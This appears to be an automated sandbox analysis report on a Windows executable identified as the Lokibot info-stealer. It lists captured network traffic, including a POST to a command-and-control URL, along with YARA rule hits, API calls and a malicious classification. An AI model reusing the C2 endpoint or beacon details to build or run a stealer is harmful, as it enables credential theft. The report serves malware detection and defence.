                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:00 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iotQdWvLirTujDm5gcFSZO5hAVcZRC711g1iSDRI0%2Brb3822z%2BZAkRmuSDHdic5Uj57iNRI9xX3TN9YhS73pU0g3Awy8opYScVWOMDtQ3fUBF1pTWEZk13UdVN58f%2F5cQx2fm8PSSX%2BiO3wOmcduLTFZflpDzA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1abfe1005b3-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:01 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CiMowfP3p1ILABVXu8os0ZvSOz0H05YMNivh25CZUCDEqQaAY7dMsK8WCuL55RhExNK%2Bo6QnXW2OoiY91LV4aaKszjnsVP1HpaPN5F1rSwA%2BPDZXqH2LcFbJP9o0ixVca8u%2FnOqGjaVHkzJnEmiYU0ivx8ExBw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1b2eb3f1f2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:02 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ga%2FiBjWS7EnclaPLKo1yPnxw%2BS5FfTFKHZyEfv8SBx7PLc2z9qVP39s4Ou2jxC%2Fu692YAeRobnrXUUs%2FH5lz44oFoe0MdOk11UK7d0oa85kJs8BzBG9Wn1TN%2BaAxNOIaqjCVMknge%2BA0NpNTHFqXMCVwFECLVA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1b9fcbb4a6d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:03 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lYEXv8S4QiPBTpXu0rf5bJXcJoQvbh8c7zrS9vvc7tBBFtqt%2FvJ59pUThsIsz8qJpgBGda1LHR3Qb02pkkKRC8u7P6%2BBRoVadCg8Od0Z6UP29X6bSAT1Hn6xm8BlysHdhvQ59Xz1U2tY28nHS%2BqgJgDxQY4HdA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1c14c3ad6f5-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:04 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yauK70pfnNL%2FJ90goDaRLF0fpdY6QkzTDmTkMnqaOy%2Bzsu%2BpC4W1kWkeLla6LwdlVBR9OMv4e4x9fXwxwON1%2FUNUz5VC3UtbTzqe0Ta8KCEmGddTn%2FYX5GbiYSC%2B8T4y3Jh3h%2FGtVWT8LEgia0f88sVfgxwueQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1c88f4e3258-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:06 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FqfohRhEiuDGtoufJZoPIftug9rZXOY0iplMIhBxlnIZUjBXtab%2FI2jNrquCvC6cysFzwjayYPJM%2BQ8Xe4Icd2EQlB4ETqyyfmXIN7wgx7vriAXvx8gP%2BAmVX2ww%2FgOFnLGPHUENBicNBv5tAeMhrHNfgSR2tA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1cf4b1f63a7-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:07 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eh8lR2VHuAd%2FabpYZW9tpbFbJtxx01L9yZN5vGSXcrxQt3sIQfCGSqyacaB9%2B3Hw2oVJwF7e7qyBl6EoN3hd1Wz7J66UUWTW97%2FegdbTRtYUGZPwPUIns9dbsm4VjmIJ9oYFMURDSLbk44n2badK3lPcW%2BIZzA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1d6ad835bf5-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:08 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M5tlpUopTFHdy2B09YRTb%2FcsTy7c1X2dY3sawEtin9CRp7iwQ7kHGGeqkAEUkgyYEQSHRIXi8G%2B0%2FPlXdk8CRXuTrtKeambiuJ5qPkn23PNVP4W0WpwprTjFbDp1IbPCTt%2F3Cd91aLWDrwa0e1cclMTu%2Brzvhw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1decf8e5373-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:09 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gHyoRfXpo3hYuDnMEqyfZQc%2BSSKitG5uVBPt%2FzcNSAReJa%2FdnOJKlN8woQLzqA6DJAKzj%2BBAgAMnotpu0f8pMIviMGE3p2X%2FOL6fJxdXzYrzgTzXXn262LF8tX4wih8wIb1Yn%2F1EvqCxP1YMpsu0Nm4iCqvv%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1e69e5e4e50-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:11 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XYPD7fSpOyQ9pBkkU7r%2Fv6SPQi%2By9UIzK%2B1PLsu1iFdzjzfJxzg08bwcNFnidoj1OFoTBYyGcRQqcfhRC5k8KnU8iYCvp%2FGLncP9ixeP9Nbj206KsQTvNUsDuvNAU27cTMUZR%2BeQ6CClwmRmdofqKK5juL3eYA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1ef9dc84e2b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:13 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x2j5ZLeoHVLB0M3bMqX0PzaoLtVYEwCKEvGv1b3ZVT4MA7hLssUg4vrSoTR%2FE5D5SrSs6jQ1VXmZshZU40BlhiqRYtlB0oP0EeQEYcVIqQcXMEb13j5XLdZzrzFppZlNUH%2BxojLr5SNYRD263tyDlV%2Fqs9%2BBWg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1fbbfb5beec-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:15 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qIfWEe%2F6jyIr5T7SRE1AvZoCaCYM%2FbFVg7K%2BtIrH%2Bg2cqN5BZ7bF9LkzYb8H4TcHvLJGxjEene%2BEEAvpDhWU%2BAObyNoj5WQ%2FY8B2zI6QnfWVy2Mj3GhLDrM5%2B3ZllzuKto5k5eS%2FKyLRpb%2B6WFBaRW9j4UK%2F8Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec209ed614e3e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:16 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MOgqfzVELnT4zNLoiR%2FSN41Qdg4UYQCVdsKnFsPBrdghsXz7OOBzVnpKSPLQWJtPGBZRxeNAZ9xU4Mal%2FMaGqsNeP9SMc6UxO7qEZCv8h9fhuYogsRPNLHTuEjgFMYjq%2FGbTIEqvZDq8c1MmmAw0PfhreX1fCA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec2124acf0eb7-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:18 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gxrVYDOVXCBXXewOH%2FJU78gmxBsZecNbyMCnQdhrynqYFCdLKoi%2BShuwRk3Wm6%2FFRdZt4dRQp2jPFEqfRpnLiPRvSx4RTqGet2X%2FOMvn5mcIBV960f5eIbfgCr3beNWQckv5%2F3qaZ1oRCAtM9L4XUXoBg8vx1A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec21c7f1e6964-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: aZOmps0Ug8.exe, 00000001.00000002.612017929.0000000000658000.00000004.00000020.sdmpString found in binary or memory: http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                Source: aZOmps0Ug8.exe, 00000001.00000002.612017929.0000000000658000.00000004.00000020.sdmpString found in binary or memory: http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.phpA
                Source: aZOmps0Ug8.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
                Source: aZOmps0Ug8.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: aZOmps0Ug8.exe, aZOmps0Ug8.exe, 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: unknownHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 196Connection: close
                Source: unknownDNS traffic detected: queries for: 74f26d34ffff049368a6cff8812f86ee.gq
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 1_2_00404ED4 recv,1_2_00404ED4
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FC2

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.2.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.2.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.aZOmps0Ug8.exe.f030000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.aZOmps0Ug8.exe.f030000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.1.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.1.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: aZOmps0Ug8.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                Source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.2.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.2.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.2.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.2.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.aZOmps0Ug8.exe.f030000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 0.2.aZOmps0Ug8.exe.f030000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.aZOmps0Ug8.exe.f030000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.1.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.1.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030FB
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_004047D30_2_004047D3
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_004061D40_2_004061D4
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_100088360_2_10008836
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_10003D100_2_10003D10
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_100110E10_2_100110E1
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_1000F9020_2_1000F902
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_100119AC0_2_100119AC
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_100059B10_2_100059B1
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_1001A9FA0_2_1001A9FA
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_1001AA090_2_1001AA09
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_1000B23E0_2_1000B23E
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_1000FE740_2_1000FE74
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_10005EA50_2_10005EA5
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_100062BD0_2_100062BD
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_100066F20_2_100066F2
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_10006B270_2_10006B27
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_1000F3900_2_1000F390
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 1_2_0040549C1_2_0040549C
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 1_2_004029D41_2_004029D4
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: String function: 00405B6F appears 42 times
                Source: aZOmps0Ug8.exe, 00000000.00000003.348584665.000000000F186000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs aZOmps0Ug8.exe
                Source: aZOmps0Ug8.exeVirustotal: Detection: 43%
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile read: C:\Users\user\Desktop\aZOmps0Ug8.exeJump to behavior
                Source: aZOmps0Ug8.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\aZOmps0Ug8.exe 'C:\Users\user\Desktop\aZOmps0Ug8.exe'
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess created: C:\Users\user\Desktop\aZOmps0Ug8.exe 'C:\Users\user\Desktop\aZOmps0Ug8.exe'
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess created: C:\Users\user\Desktop\aZOmps0Ug8.exe 'C:\Users\user\Desktop\aZOmps0Ug8.exe' Jump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,1_2_0040650A
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile created: C:\Users\user\AppData\Local\Temp\nsj153F.tmpJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@81/3
